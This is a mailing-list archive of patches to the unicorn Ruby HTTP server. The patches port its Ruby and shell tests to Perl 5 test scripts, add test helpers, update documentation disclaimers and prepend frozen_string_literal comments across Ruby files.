-      "PUT / HTTP/1.1\r\n" \
-      "Host: foo\r\n" \
-      "Content-Length: #{length}\r\n" \
-      "\r\n")
-    count.times { assert_equal bs, client.syswrite(buf) }
-    assert_equal 0, client.sysseek(0)
-    env = @request.read_headers(client, AI)
-    assert ! env.include?(:http_body)
-    assert_equal length, env['rack.input'].size
-    count.times {
-      tmp = env['rack.input'].read(bs)
-      tmp << env['rack.input'].read(bs - tmp.size) if tmp.size != bs
-      assert_equal buf, tmp
-    }
-    assert_nil env['rack.input'].read(bs)
-    env['rack.input'].rewind
-    assert_kind_of Array, @lint.call(env)
-  end
-end
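
The REQUEST_PATH/QUERY_STRING/FRAGMENT expectations exercised above come
from unicorn's Ragel-generated C parser; this regex stand-in (for
illustration only, not the real parser, and covering only the
path?query#fragment split, not OPTIONS * or absolute URIs) shows the
observable behavior the tests assert:

```perl
use v5.14;

# Illustrative stand-in for the path/query/fragment split asserted in
# the ported tests; unicorn's real parser is Ragel-generated C, so this
# regex is only a sketch of the behavior, not the implementation.
sub split_uri {
	my ($uri) = @_;
	$uri =~ m{\A([^?#]*)(?:\?([^#]*))?(?:#(.*))?\z} or return undef;
	return {
		REQUEST_PATH => $1,
		QUERY_STRING => $2 // '',
		FRAGMENT     => $3 // '',
	};
}

my $env = split_uri('/env_dump?a=b#frag');
```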

[-- Attachment #6: 0005-port-test-unit-test_ccc.rb-to-Perl-5.patch --]
[-- Type: text/x-diff, Size: 6013 bytes --]

From d6d127f50f9225bf51ef6ce0abce9bad87efaae3 Mon Sep 17 00:00:00 2001
From: Eric Wong <bofh@yhbt.net>
Date: Sun, 5 May 2024 22:15:39 +0000
Subject: [PATCH 5/5] port test/unit/test_ccc.rb to Perl 5

We'll fold this into integration.t to reduce startup time
penalties and get the benefit of a stable language to reduce
maintenance overhead.
---
 t/integration.ru      |  4 ++
 t/integration.t       | 33 ++++++++++++++++
 test/unit/test_ccc.rb | 92 -------------------------------------------
 3 files changed, 37 insertions(+), 92 deletions(-)
 delete mode 100644 test/unit/test_ccc.rb

diff --git a/t/integration.ru b/t/integration.ru
index a6b022a..aaed608 100644
--- a/t/integration.ru
+++ b/t/integration.ru
@@ -87,6 +87,7 @@ def rack_input_tests(env)
   [ 200, h, [ dig.hexdigest ] ]
 end
 
+$nr_aborts = 0
 run(lambda do |env|
   case env['REQUEST_METHOD']
   when 'GET'
@@ -101,7 +102,10 @@ def rack_input_tests(env)
     when '/early_hints_rack2'; early_hints(env, "r\n2")
     when '/early_hints_rack3'; early_hints(env, %w(r 3))
     when '/broken_app'; raise RuntimeError, 'hello'
+    when '/aborted'; $nr_aborts += 1; [ 200, {}, [] ]
+    when '/nr_aborts'; [ 200, { 'nr-aborts' => "#$nr_aborts" }, [] ]
     when '/nil'; nil
+    when '/read_fifo'; [ 200, {}, [ File.read(env['HTTP_READ_FIFO']) ] ]
     else '/'; [ 200, {}, [ env_dump(env) ] ]
     end # case PATH_INFO (GET)
   when 'POST'
diff --git a/t/integration.t b/t/integration.t
index 3b1d6df..2d448cd 100644
--- a/t/integration.t
+++ b/t/integration.t
@@ -405,6 +405,39 @@ EOM
 	my $wpid = readline($fifo_fh);
 	like($wpid, qr/\Apid=\d+\z/a , 'new worker ready');
 	$ck_early_hints->('ccc on');
+
+	$c = tcp_start $srv, 'GET /env_dump HTTP/1.0';
+	vec(my $rvec = '', fileno($c), 1) = 1;
+	select($rvec, undef, undef, 10) or BAIL_OUT 'timed out env_dump';
+	($status, $hdr) = slurp_hdr($c);
+	like $status, qr!\AHTTP/1\.[01] 200!, 'got part of first response';
+	ok $hdr, 'got all headers';
+
+	# start a slow TCP request
+	my $rfifo = "$tmpdir/rfifo";
+	mkfifo_die $rfifo;
+	$c = tcp_start $srv, "GET /read_fifo HTTP/1.0\r\nRead-FIFO: $rfifo";
+	tcp_start $srv, 'GET /aborted HTTP/1.0' for (1..100);
+	write_file '>', $rfifo, 'TFIN';
+	($status, $hdr) = slurp_hdr($c);
+	like $status, qr!\AHTTP/1\.[01] 200!, 'got part of first response';
+	$bdy = <$c>;
+	is $bdy, 'TFIN', 'got slow response from TCP socket';
+
+	# slow Unix socket request
+	$c = unix_start $u1, "GET /read_fifo HTTP/1.0\r\nRead-FIFO: $rfifo";
+	vec($rvec = '', fileno($c), 1) = 1;
+	select($rvec, undef, undef, 10) or BAIL_OUT 'timed out Unix CCC';
+	unix_start $u1, 'GET /aborted HTTP/1.0' for (1..100);
+	write_file '>', $rfifo, 'UFIN';
+	($status, $hdr) = slurp_hdr($c);
+	like $status, qr!\AHTTP/1\.[01] 200!, 'got part of first response';
+	$bdy = <$c>;
+	is $bdy, 'UFIN', 'got slow response from Unix socket';
+
+	($status, $hdr, $bdy) = do_req $srv, 'GET /nr_aborts HTTP/1.0';
+	like "@$hdr", qr/nr-aborts: 0\b/,
+		'aborted connections unseen by Rack app';
 }
 
 if ('max_header_len internal API') {
diff --git a/test/unit/test_ccc.rb b/test/unit/test_ccc.rb
deleted file mode 100644
index a0a2bff..0000000
--- a/test/unit/test_ccc.rb
+++ /dev/null
@@ -1,92 +0,0 @@
-# frozen_string_literal: false
-require 'socket'
-require 'unicorn'
-require 'io/wait'
-require 'tempfile'
-require 'test/unit'
-require './test/test_helper'
-
-class TestCccTCPI < Test::Unit::TestCase
-  def test_ccc_tcpi
-    start_pid = $$
-    host = '127.0.0.1'
-    srv = TCPServer.new(host, 0)
-    port = srv.addr[1]
-    err = Tempfile.new('unicorn_ccc')
-    rd, wr = IO.pipe
-    sleep_pipe = IO.pipe
-    pid = fork do
-      sleep_pipe[1].close
-      reqs = 0
-      rd.close
-      worker_pid = nil
-      app = lambda do |env|
-        worker_pid ||= begin
-          at_exit { wr.write(reqs.to_s) if worker_pid == $$ }
-          $$
-        end
-        reqs += 1
-
-        # will wake up when writer closes
-        sleep_pipe[0].read if env['PATH_INFO'] == '/sleep'
-
-        [ 200, {'content-length'=>'0', 'content-type'=>'text/plain'}, [] ]
-      end
-      ENV['UNICORN_FD'] = srv.fileno.to_s
-      opts = {
-        listeners: [ "#{host}:#{port}" ],
-        stderr_path: err.path,
-        check_client_connection: true,
-      }
-      uni = Unicorn::HttpServer.new(app, opts)
-      uni.start.join
-    end
-    wr.close
-
-    # make sure the server is running, at least
-    client = tcp_socket(host, port)
-    client.write("GET / HTTP/1.1\r\nHost: example.com\r\n\r\n")
-    assert client.wait(10), 'never got response from server'
-    res = client.read
-    assert_match %r{\AHTTP/1\.1 200}, res, 'got part of first response'
-    assert_match %r{\r\n\r\n\z}, res, 'got end of response, server is ready'
-    client.close
-
-    # start a slow request...
-    sleeper = tcp_socket(host, port)
-    sleeper.write("GET /sleep HTTP/1.1\r\nHost: example.com\r\n\r\n")
-
-    # and a bunch of aborted ones
-    nr = 100
-    nr.times do |i|
-      client = tcp_socket(host, port)
-      client.write("GET /collections/#{rand(10000)} HTTP/1.1\r\n" \
-                   "Host: example.com\r\n\r\n")
-      client.close
-    end
-    sleep_pipe[1].close # wake up the reader in the worker
-    res = sleeper.read
-    assert_match %r{\AHTTP/1\.1 200}, res, 'got part of first sleeper response'
-    assert_match %r{\r\n\r\n\z}, res, 'got end of sleeper response'
-    sleeper.close
-    kpid = pid
-    pid = nil
-    Process.kill(:QUIT, kpid)
-    _, status = Process.waitpid2(kpid)
-    assert status.success?
-    reqs = rd.read.to_i
-    warn "server got #{reqs} requests with #{nr} CCC aborted\n" if $DEBUG
-    assert_operator reqs, :<, nr
-    assert_operator reqs, :>=, 2, 'first 2 requests got through, at least'
-  ensure
-    return if start_pid != $$
-    srv.close if srv
-    if pid
-      Process.kill(:QUIT, pid)
-      _, status = Process.waitpid2(pid)
-      assert status.success?
-    end
-    err.close! if err
-    rd.close if rd
-  end
-end


* [PATCH 0/4] a small pile of patches
@ 2024-03-23 19:45  1% Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2024-03-23 19:45 UTC (permalink / raw)
  To: unicorn-public

[-- Attachment #1: Type: text/plain, Size: 4446 bytes --]

Some stuff to future-proof against upcoming Ruby incompatibilities.
More coming....

I've also pushed out preliminary work (started in 2021) to the
`pico' branch to switch the HTTP parser from Ragel to
picohttpparser.  It will simplify the build + maintenance,
especially when distros carry different Ragel versions (or don't
package it at all, as some hackers can't afford bandwidth and disk
for a C++ toolchain).

Other notes: New releases will probably be hosted on yhbt.net if
the Rubygems.org MFA threshold is reached.  Caring about the
identity of hackers is totally misguided when we already show
our code (and even document it!).  If you can't audit the code
yourself, get an actual professional to do it and don't bother
amateurs like me.

Eric Wong (4):
  t/integration: disable proxies when running curl(1)
  tests: port back-out-of-upgrade to Perl 5
  doc: various updates and disclaimers
  treewide: future-proof frozen_string_literal changes

 HACKING                             |  13 +++-
 README                              |   9 +++
 Rakefile                            |   1 +
 TODO                                |   4 +-
 bin/unicorn                         |   1 +
 bin/unicorn_rails                   |   1 +
 examples/big_app_gc.rb              |   1 +
 examples/echo.ru                    |   1 +
 examples/logger_mp_safe.rb          |   1 +
 examples/unicorn.conf.minimal.rb    |   1 +
 examples/unicorn.conf.rb            |   1 +
 ext/unicorn_http/extconf.rb         |   1 +
 lib/unicorn.rb                      |   1 +
 lib/unicorn/app/old_rails.rb        |   1 +
 lib/unicorn/app/old_rails/static.rb |   1 +
 lib/unicorn/cgi_wrapper.rb          |   1 +
 lib/unicorn/configurator.rb         |   1 +
 lib/unicorn/const.rb                |   1 +
 lib/unicorn/http_request.rb         |   1 +
 lib/unicorn/http_response.rb        |   1 +
 lib/unicorn/http_server.rb          |   1 +
 lib/unicorn/launcher.rb             |   1 +
 lib/unicorn/oob_gc.rb               |   1 +
 lib/unicorn/preread_input.rb        |   1 +
 lib/unicorn/select_waiter.rb        |   1 +
 lib/unicorn/socket_helper.rb        |   1 +
 lib/unicorn/stream_input.rb         |   1 +
 lib/unicorn/tee_input.rb            |   1 +
 lib/unicorn/tmpio.rb                |   1 +
 lib/unicorn/util.rb                 |   1 +
 lib/unicorn/worker.rb               |   1 +
 setup.rb                            |   1 +
 t/back-out-of-upgrade.t             |  44 +++++++++++
 t/broken-app.ru                     |   1 +
 t/client_body_buffer_size.ru        |   1 +
 t/detach.ru                         |   1 +
 t/env.ru                            |   1 +
 t/fails-rack-lint.ru                |   1 +
 t/heartbeat-timeout.ru              |   1 +
 t/integration.ru                    |   1 +
 t/integration.t                     |   1 +
 t/lib.perl                          |  67 ++++++++++++++---
 t/listener_names.ru                 |   1 +
 t/oob_gc.ru                         |   1 +
 t/oob_gc_path.ru                    |   1 +
 t/pid.ru                            |   1 +
 t/preread_input.ru                  |   1 +
 t/reopen-logs.ru                    |   1 +
 t/t0008-back_out_of_upgrade.sh      | 110 ----------------------------
 t/t0013.ru                          |   1 +
 t/t0014.ru                          |   1 +
 t/t0301.ru                          |   1 +
 test/aggregate.rb                   |   1 +
 test/benchmark/dd.ru                |   1 +
 test/benchmark/ddstream.ru          |   1 +
 test/benchmark/readinput.ru         |   1 +
 test/benchmark/stack.ru             |   1 +
 test/exec/test_exec.rb              |   1 +
 test/test_helper.rb                 |   1 +
 test/unit/test_ccc.rb               |   1 +
 test/unit/test_configurator.rb      |   1 +
 test/unit/test_droplet.rb           |   1 +
 test/unit/test_http_parser.rb       |   1 +
 test/unit/test_http_parser_ng.rb    |   1 +
 test/unit/test_request.rb           |   1 +
 test/unit/test_server.rb            |   1 +
 test/unit/test_signals.rb           |   1 +
 test/unit/test_socket_helper.rb     |   1 +
 test/unit/test_stream_input.rb      |   1 +
 test/unit/test_tee_input.rb         |   1 +
 test/unit/test_util.rb              |   1 +
 test/unit/test_waiter.rb            |   1 +
 unicorn.gemspec                     |   1 +
 73 files changed, 188 insertions(+), 126 deletions(-)
 create mode 100644 t/back-out-of-upgrade.t
 delete mode 100755 t/t0008-back_out_of_upgrade.sh

[-- Attachment #2: 0001-t-integration-disable-proxies-when-running-curl-1.patch --]
[-- Type: text/x-diff, Size: 737 bytes --]

From f3acce5dce62ac4b0288d3c0ddf0a6db2cbd9e7f Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Tue, 9 Jan 2024 21:35:08 +0000
Subject: [PATCH 1/4] t/integration: disable proxies when running curl(1)

This was also done in t/test-lib.sh, but using '*' is more
encompassing.
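For illustration only (the proxy URL and port below are made up, not
from the patch): the effect of the `*' wildcard can be seen in a plain
shell session, since curl consults these environment variables itself.

```shell
# curl honors http_proxy/NO_PROXY from the environment.  NO_PROXY='*'
# matches every host, so requests go direct even when a proxy variable
# leaks in from the developer's environment.
export http_proxy=http://proxy.example.invalid:8080  # illustrative leak
export NO_PROXY='*'  # more encompassing than listing 127.0.0.1, localhost, ...
# curl -sSf http://127.0.0.1:8080/  # would now bypass the proxy entirely
```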
---
 t/integration.t | 1 +
 1 file changed, 1 insertion(+)

diff --git a/t/integration.t b/t/integration.t
index 7310ff2..d17ace0 100644
--- a/t/integration.t
+++ b/t/integration.t
@@ -27,6 +27,7 @@ listen "$u1"
 EOM
 my $ar = unicorn(qw(-E none t/integration.ru -c), $u_conf, { 3 => $srv });
 my $curl = which('curl');
+local $ENV{NO_PROXY} = '*'; # for curl
 my $fifo = "$tmpdir/fifo";
 POSIX::mkfifo($fifo, 0600) or die "mkfifo: $!";
 my %PUT = (

[-- Attachment #3: 0002-tests-port-back-out-of-upgrade-to-Perl-5.patch --]
[-- Type: text/x-diff, Size: 8889 bytes --]

From 724fb631c76f09964ec289ee8e144886ba15d380 Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 6 Nov 2023 05:45:29 +0000
Subject: [PATCH 2/4] tests: port back-out-of-upgrade to Perl 5

Another place where we can be faster without adding more
dependencies on Ruby maintaining stable behavior.
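For readers unfamiliar with the signal sequence being tested, a rough
sketch follows.  The function and its arguments are illustrative, not
part of the patch; see the test itself for the authoritative sequence.

```shell
# Sketch of the upgrade-then-back-out sequence the test exercises.
# $1 = old master PID, $2 = pid file path (both illustrative).
back_out_of_upgrade () {
	kill -USR2 "$1"        # re-exec a new master; old PID moves to "$2.oldbin"
	kill -WINCH "$1"       # old master gracefully drops its workers
	new_pid=$(cat "$2")    # pid file now holds the new master's PID
	kill -HUP "$1"         # change of heart: old master re-spawns workers
	kill -QUIT "$new_pid"  # gracefully shut down the new master
}
```

After QUIT, the .oldbin pid file disappears and the original master's
PID is restored to the pid file, which is what the test asserts.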
---
 t/back-out-of-upgrade.t        |  44 +++++++++++++
 t/lib.perl                     |  67 +++++++++++++++++---
 t/t0008-back_out_of_upgrade.sh | 110 ---------------------------------
 3 files changed, 102 insertions(+), 119 deletions(-)
 create mode 100644 t/back-out-of-upgrade.t
 delete mode 100755 t/t0008-back_out_of_upgrade.sh

diff --git a/t/back-out-of-upgrade.t b/t/back-out-of-upgrade.t
new file mode 100644
index 0000000..cf3b09f
--- /dev/null
+++ b/t/back-out-of-upgrade.t
@@ -0,0 +1,44 @@
+#!perl -w
+# Copyright (C) unicorn hackers <unicorn-public@yhbt.net>
+# License: GPL-3.0+ <https://www.gnu.org/licenses/gpl-3.0.txt>
+# test backing out of USR2 upgrade
+use v5.14; BEGIN { require './t/lib.perl' };
+use autodie;
+my $srv = tcp_server();
+mkfifo_die $fifo;
+write_file '>', $u_conf, <<EOM;
+preload_app true
+stderr_path "$err_log"
+pid "$pid_file"
+after_fork { |s,w| File.open('$fifo', 'w') { |fp| fp.write "pid=#\$\$" } }
+EOM
+my $ar = unicorn(qw(-E none t/pid.ru -c), $u_conf, { 3 => $srv });
+
+like(my $wpid_orig_1 = slurp($fifo), qr/\Apid=\d+\z/a, 'got worker pid');
+
+ok $ar->do_kill('USR2'), 'USR2 to start upgrade';
+ok $ar->do_kill('WINCH'), 'drop old worker';
+
+like(my $wpid_new = slurp($fifo), qr/\Apid=\d+\z/a, 'got pid from new master');
+chomp(my $new_pid = slurp($pid_file));
+isnt $new_pid, $ar->{pid}, 'PID file changed';
+chomp(my $pid_oldbin = slurp("$pid_file.oldbin"));
+is $pid_oldbin, $ar->{pid}, '.oldbin PID valid';
+
+ok $ar->do_kill('HUP'), 'HUP old master';
+like(my $wpid_orig_2 = slurp($fifo), qr/\Apid=\d+\z/a, 'got worker new pid');
+ok kill('QUIT', $new_pid), 'abort old master';
+kill_until_dead $new_pid;
+
+my ($st, $hdr, $req_pid) = do_req $srv, 'GET /';
+chomp $req_pid;
+is $wpid_orig_2, "pid=$req_pid", 'new worker on old worker serves';
+
+ok !-f "$pid_file.oldbin", '.oldbin PID file gone';
+chomp(my $old_pid = slurp($pid_file));
+is $old_pid, $ar->{pid}, 'PID file restored';
+
+my @log = grep !/ERROR -- : reaped .*? exec\(\)-ed/, slurp($err_log);
+check_stderr @log;
+undef $tmpdir;
+done_testing;
diff --git a/t/lib.perl b/t/lib.perl
index 9254b23..b20a2c6 100644
--- a/t/lib.perl
+++ b/t/lib.perl
@@ -6,30 +6,58 @@ use v5.14;
 use parent qw(Exporter);
 use autodie;
 use Test::More;
+use Socket qw(SOMAXCONN);
 use Time::HiRes qw(sleep time);
 use IO::Socket::INET;
+use IO::Socket::UNIX;
+use Carp qw(croak);
 use POSIX qw(dup2 _exit setpgid :signal_h SEEK_SET F_SETFD);
 use File::Temp 0.19 (); # 0.19 for ->newdir
 our ($tmpdir, $errfh, $err_log, $u_sock, $u_conf, $daemon_pid,
-	$pid_file);
+	$pid_file, $wtest_sock, $fifo);
 our @EXPORT = qw(unicorn slurp tcp_server tcp_start unicorn
 	$tmpdir $errfh $err_log $u_sock $u_conf $daemon_pid $pid_file
+	$wtest_sock $fifo
 	SEEK_SET tcp_host_port which spawn check_stderr unix_start slurp_hdr
-	do_req stop_daemon sleep time);
+	do_req stop_daemon sleep time mkfifo_die kill_until_dead write_file);
 
 my ($base) = ($0 =~ m!\b([^/]+)\.[^\.]+\z!);
 $tmpdir = File::Temp->newdir("unicorn-$base-XXXX", TMPDIR => 1);
+
+$wtest_sock = "$tmpdir/wtest.sock";
 $err_log = "$tmpdir/err.log";
 $pid_file = "$tmpdir/pid";
+$fifo = "$tmpdir/fifo";
 $u_sock = "$tmpdir/u.sock";
 $u_conf = "$tmpdir/u.conf.rb";
 open($errfh, '>>', $err_log);
 
+if (my $t = $ENV{TAIL}) {
+	my @tail = $t =~ /tail/ ? split(/\s+/, $t) : (qw(tail -F));
+	push @tail, $err_log;
+	my $pid = fork;
+	if ($pid == 0) {
+		open STDOUT, '>&', \*STDERR;
+		exec @tail;
+		die "exec(@tail): $!";
+	}
+	say "# @tail";
+	sleep 0.2;
+	UnicornTest::AutoReap->new($pid);
+}
+
+sub kill_until_dead ($;%) {
+	my ($pid, %opt) = @_;
+	my $tries = $opt{tries} // 1000;
+	my $sig = $opt{sig} // 0;
+	while (CORE::kill($sig, $pid) && --$tries) { sleep(0.01) }
+	$tries or croak "PID: $pid did not die after signal ($sig)";
+}
+
 sub stop_daemon (;$) {
 	my ($is_END) = @_;
 	kill('TERM', $daemon_pid);
-	my $tries = 1000;
-	while (CORE::kill(0, $daemon_pid) && --$tries) { sleep(0.01) }
+	kill_until_dead $daemon_pid;
 	if ($is_END && CORE::kill(0, $daemon_pid)) { # after done_testing
 		CORE::kill('KILL', $daemon_pid);
 		die "daemon_pid=$daemon_pid did not die";
@@ -44,8 +72,9 @@ END {
 	stop_daemon(1) if defined $daemon_pid;
 };
 
-sub check_stderr () {
-	my @log = slurp($err_log);
+sub check_stderr (@) {
+	my @log = @_;
+	slurp($err_log) if !@log;
 	diag("@log") if $ENV{V};
 	my @err = grep(!/NameError.*Unicorn::Waiter/, grep(/error/i, @log));
 	@err = grep(!/failed to set accept_filter=/, @err);
@@ -63,6 +92,16 @@ sub slurp_hdr {
 	($status, \@hdr);
 }
 
+sub unix_server (;$@) {
+	my $l = shift // $u_sock;
+	IO::Socket::UNIX->new(Listen => SOMAXCONN, Local => $l, Blocking => 0,
+				Type => SOCK_STREAM, @_);
+}
+
+sub unix_connect ($) {
+	IO::Socket::UNIX->new(Peer => $_[0], Type => SOCK_STREAM);
+}
+
 sub tcp_server {
 	my %opt = (
 		ReuseAddr => 1,
@@ -95,8 +134,7 @@ sub tcp_host_port {
 
 sub unix_start ($@) {
 	my ($dst, @req) = @_;
-	my $s = IO::Socket::UNIX->new(Peer => $dst, Type => SOCK_STREAM) or
-		BAIL_OUT "unix connect $dst: $!";
+	my $s = unix_connect($dst) or BAIL_OUT "unix connect $dst: $!";
 	$s->autoflush(1);
 	print $s @req, "\r\n\r\n" if @req;
 	$s;
@@ -201,7 +239,7 @@ sub unicorn {
 	state $ver = $ENV{TEST_RUBY_VERSION} // `$ruby -e 'print RUBY_VERSION'`;
 	state $eng = $ENV{TEST_RUBY_ENGINE} // `$ruby -e 'print RUBY_ENGINE'`;
 	state $ext = File::Spec->rel2abs("test/$eng-$ver/ext/unicorn_http");
-	state $exe = File::Spec->rel2abs('bin/unicorn');
+	state $exe = File::Spec->rel2abs("test/$eng-$ver/bin/unicorn");
 	my $pid = spawn(\%env, $ruby, '-I', $lib, '-I', $ext, $exe, @args);
 	UnicornTest::AutoReap->new($pid);
 }
@@ -219,6 +257,17 @@ sub do_req ($@) {
 	($status, $hdr, $bdy);
 }
 
+sub mkfifo_die ($;$) {
+	POSIX::mkfifo($_[0], $_[1] // 0600) or croak "mkfifo: $!";
+}
+
+sub write_file ($$@) { # mode, filename, LIST (for print)
+	open(my $fh, shift, shift);
+	print $fh @_;
+	# return $fh for further writes if user wants it:
+	defined(wantarray) && !wantarray ? $fh : close $fh;
+}
+
 # automatically kill + reap children when this goes out-of-scope
 package UnicornTest::AutoReap;
 use v5.14;
diff --git a/t/t0008-back_out_of_upgrade.sh b/t/t0008-back_out_of_upgrade.sh
deleted file mode 100755
index 96d4057..0000000
--- a/t/t0008-back_out_of_upgrade.sh
+++ /dev/null
@@ -1,110 +0,0 @@
-#!/bin/sh
-. ./test-lib.sh
-t_plan 13 "backout of USR2 upgrade"
-
-worker_wait_start () {
-	test xSTART = x"$(cat $fifo)"
-	unicorn_pid=$(cat $pid)
-}
-
-t_begin "setup and start" && {
-	unicorn_setup
-	rm -f $pid.oldbin
-
-cat >> $unicorn_config <<EOF
-after_fork do |server, worker|
-  # test script will block while reading from $fifo,
-  # so notify the script on the first worker we spawn
-  # by opening the FIFO
-  if worker.nr == 0
-    File.open("$fifo", "wb") { |fp| fp.syswrite "START" }
-  end
-end
-EOF
-	unicorn -D -c $unicorn_config pid.ru
-	worker_wait_start
-	orig_master_pid=$unicorn_pid
-}
-
-t_begin "read original worker pid" && {
-	orig_worker_pid=$(curl -sSf http://$listen/)
-	test -n "$orig_worker_pid" && kill -0 $orig_worker_pid
-}
-
-t_begin "upgrade to new master" && {
-	kill -USR2 $orig_master_pid
-}
-
-t_begin "kill old worker" && {
-	kill -WINCH $orig_master_pid
-}
-
-t_begin "wait for new worker to start" && {
-	worker_wait_start
-	test $unicorn_pid -ne $orig_master_pid
-	new_master_pid=$unicorn_pid
-}
-
-t_begin "old master pid is stashed in $pid.oldbin" && {
-	test -s "$pid.oldbin"
-	test $orig_master_pid -eq $(cat $pid.oldbin)
-}
-
-t_begin "ensure old worker is no longer running" && {
-	i=0
-	while kill -0 $orig_worker_pid 2>/dev/null
-	do
-		i=$(( $i + 1 ))
-		test $i -lt 600 || die "timed out"
-		sleep 1
-	done
-}
-
-t_begin "capture pid of new worker" && {
-	new_worker_pid=$(curl -sSf http://$listen/)
-}
-
-t_begin "reload old master process" && {
-	kill -HUP $orig_master_pid
-	worker_wait_start
-}
-
-t_begin "gracefully kill new master and ensure it dies" && {
-	kill -QUIT $new_master_pid
-	i=0
-	while kill -0 $new_worker_pid 2>/dev/null
-	do
-		i=$(( $i + 1 ))
-		test $i -lt 600 || die "timed out"
-		sleep 1
-	done
-}
-
-t_begin "ensure $pid.oldbin does not exist" && {
-	i=0
-	while test -s $pid.oldbin
-	do
-		i=$(( $i + 1 ))
-		test $i -lt 600 || die "timed out"
-		sleep 1
-	done
-	while ! test -s $pid
-	do
-		i=$(( $i + 1 ))
-		test $i -lt 600 || die "timed out"
-		sleep 1
-	done
-}
-
-t_begin "ensure $pid is correct" && {
-	cur_master_pid=$(cat $pid)
-	test $orig_master_pid -eq $cur_master_pid
-}
-
-t_begin "killing succeeds" && {
-	kill $orig_master_pid
-}
-
-dbgcat r_err
-
-t_done

[-- Attachment #4: 0003-doc-various-updates-and-disclaimers.patch --]
[-- Type: text/x-diff, Size: 3343 bytes --]

From 69d15a7a51a096b6acf00ccf23e1b988076d3b5f Mon Sep 17 00:00:00 2001
From: Eric Wong <bofh@yhbt.net>
Date: Mon, 1 Jan 2024 10:43:13 +0000
Subject: [PATCH 3/4] doc: various updates and disclaimers

Covering my ass from draconian legislation.
---
 HACKING | 13 +++++++++----
 README  |  9 +++++++++
 TODO    |  4 +---
 3 files changed, 19 insertions(+), 7 deletions(-)

diff --git a/HACKING b/HACKING
index 5aca83e..777e75e 100644
--- a/HACKING
+++ b/HACKING
@@ -6,6 +6,8 @@ Like Mongrel, we use Ruby where it makes sense, and Ragel with C where
 it helps performance.  All of the code that actually runs your Rack
 application is written Ruby, Ragel or C.
 
+Ragel may be dropped in favor of a picohttpparser-based one in the future.
+
 As far as tests and documentation goes, we're not afraid to embrace Unix
 and use traditional Unix tools where they make sense and get the job
 done.
@@ -16,6 +18,9 @@ Tests are good, but slow tests make development slow, so we make tests
 faster (in parallel) with GNU make (instead of Rake) and avoiding
 RubyGems.
 
+New tests are written in Perl 5 and use TAP <https://testanything.org/>
+to ensure stability and immunity from Ruby incompatibilities.
+
 Users of GNU-based systems (such as GNU/Linux) usually have GNU make
 installed as "make" instead of "gmake".
 
@@ -69,10 +74,10 @@ supported by the versions of Ruby we target.
 
 === Ragel Compatibility
 
-We target the latest released version of Ragel and will update our code
-to keep up with new releases.  Packaged tarballs and gems include the
-generated source code so they will remain usable if compatibility is
-broken.
+We target the latest released version of Ragel in Debian and will update
+our code to keep up with new releases.  Packaged tarballs and gems
+include the generated source code so they will remain usable if
+compatibility is broken.
 
 == Contributing
 
diff --git a/README b/README
index 84c0fdf..b60ed00 100644
--- a/README
+++ b/README
@@ -122,6 +122,7 @@ supported.  Run `unicorn -h` to see command-line options.
 
 There is NO WARRANTY whatsoever if anything goes wrong, but
 {let us know}[link:ISSUES.html] and maybe someone can fix it.
+No commercial support will ever be provided by the amateur maintainer.
 
 unicorn is designed to only serve fast clients either on the local host
 or a fast LAN.  See the PHILOSOPHY and DESIGN documents for more details
@@ -132,6 +133,14 @@ damage done to the entire Ruby ecosystem.  Its unintentional popularity
 set Ruby back decades in parallelism, concurrency and robustness since
 it prolongs and proliferates the existence of poorly-written code.
 
+unicorn hackers are NOT responsible for your supply chain security:
+read and understand it yourself or get someone you trust to audit it.
+Malicious commits and releases will be made if under duress.  The only
+defense you'll ever have is from reviewing the source code.
+
+No user or contributor will ever be expected to sacrifice their own
+security by running JavaScript or revealing any personal information.
+
 == Contact
 
 All feedback (bug reports, user/development dicussion, patches, pull
diff --git a/TODO b/TODO
index ebbccdc..a3b18fd 100644
--- a/TODO
+++ b/TODO
@@ -1,3 +1 @@
-* Documentation improvements
-
-* improve test suite
+* improve test suite (port to Perl 5 for stability and maintainability)

[-- Attachment #5: 0004-treewide-future-proof-frozen_string_literal-changes.patch --]
[-- Type: text/x-diff, Size: 24100 bytes --]

From ccf2443901c18ffb26b2785f52d921005e862167 Mon Sep 17 00:00:00 2001
From: Eric Wong <bofh@yhbt.net>
Date: Thu, 8 Feb 2024 12:16:31 +0000
Subject: [PATCH 4/4] treewide: future-proof frozen_string_literal changes

Once again Ruby seems ready to introduce more incompatibilities
and force busywork upon maintainers[1].  In order to avoid
incompatibilities in the future, I used a Perl script[2] to
prepend `frozen_string_literal: false' to every Ruby file.

Somebody interested will have to go through every Ruby source
file and enable frozen_string_literal once they've thoroughly
verified it's safe to do so.

[1] https://bugs.ruby-lang.org/issues/20205
[2] https://yhbt.net/add-fsl.git/74d7689/s/?b=add-fsl.perl
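The linked script also copes with shebang lines and `-*- encoding -*-'
comments; a much-simplified sketch of the basic idea (file name is
illustrative) might look like:

```shell
# Simplified sketch: prepend the magic comment to a Ruby file unless
# one is already present.  (Unlike the real add-fsl.perl, this does not
# handle shebang or encoding lines, which must come first.)
f=example.rb                # illustrative target file
printf 'puts :hi\n' > "$f"  # stand-in Ruby source for the demo
grep -q '^# frozen_string_literal:' "$f" || {
	printf '# frozen_string_literal: false\n' > "$f.tmp"
	cat "$f" >> "$f.tmp"
	mv "$f.tmp" "$f"
}
head -n1 "$f"   # -> # frozen_string_literal: false
```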
---
 Rakefile                            | 1 +
 bin/unicorn                         | 1 +
 bin/unicorn_rails                   | 1 +
 examples/big_app_gc.rb              | 1 +
 examples/echo.ru                    | 1 +
 examples/logger_mp_safe.rb          | 1 +
 examples/unicorn.conf.minimal.rb    | 1 +
 examples/unicorn.conf.rb            | 1 +
 ext/unicorn_http/extconf.rb         | 1 +
 lib/unicorn.rb                      | 1 +
 lib/unicorn/app/old_rails.rb        | 1 +
 lib/unicorn/app/old_rails/static.rb | 1 +
 lib/unicorn/cgi_wrapper.rb          | 1 +
 lib/unicorn/configurator.rb         | 1 +
 lib/unicorn/const.rb                | 1 +
 lib/unicorn/http_request.rb         | 1 +
 lib/unicorn/http_response.rb        | 1 +
 lib/unicorn/http_server.rb          | 1 +
 lib/unicorn/launcher.rb             | 1 +
 lib/unicorn/oob_gc.rb               | 1 +
 lib/unicorn/preread_input.rb        | 1 +
 lib/unicorn/select_waiter.rb        | 1 +
 lib/unicorn/socket_helper.rb        | 1 +
 lib/unicorn/stream_input.rb         | 1 +
 lib/unicorn/tee_input.rb            | 1 +
 lib/unicorn/tmpio.rb                | 1 +
